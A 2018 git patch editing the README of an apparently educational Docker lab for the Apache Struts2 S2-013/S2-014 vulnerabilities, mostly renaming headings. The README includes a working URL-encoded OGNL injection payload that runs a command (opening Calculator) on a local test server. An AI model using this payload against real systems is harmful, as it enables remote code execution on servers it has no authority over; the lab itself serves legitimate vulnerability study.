From b14558c0ba25b2d4a93791fe85444308bba0f071 Mon Sep 17 00:00:00 2001 From: JrDw0 <37445725+JrDw0@users.noreply.github.com> Date: Sat, 15 Sep 2018 23:14:25 +0800 Subject: [PATCH] Update README.md --- struts2/s2-013/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/struts2/s2-013/README.md b/struts2/s2-013/README.md index cc7bf9274c..ae0fdff9c9 100644 --- a/struts2/s2-013/README.md +++ b/struts2/s2-013/README.md @@ -2,21 +2,21 @@ [中文版本(Chinese version)](README.zh-cn.md) -Version: 2.0.0 - 2.3.14.1 +Affected Version: 2.0.0 - 2.3.14.1 Details: - http://struts.apache.org/docs/s2-013.html - http://struts.apache.org/docs/s2-014.html -## setup +## Setup ``` docker-compose build docker-compose up -d ``` -## Refer +## Reference The Struts2's tag, `` and ``, provide an includeParams attribute.The main scope of that attribute is to understand whether includes http request parameter or not. @@ -46,4 +46,4 @@ S2-014 is a correction to S2-013. Because when S2-013 is fixed, the execution me ``` http://localhost:8080/S2-013/link.action?xxxx=%24%7B%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29%29%7D -``` \ No newline at end of file +```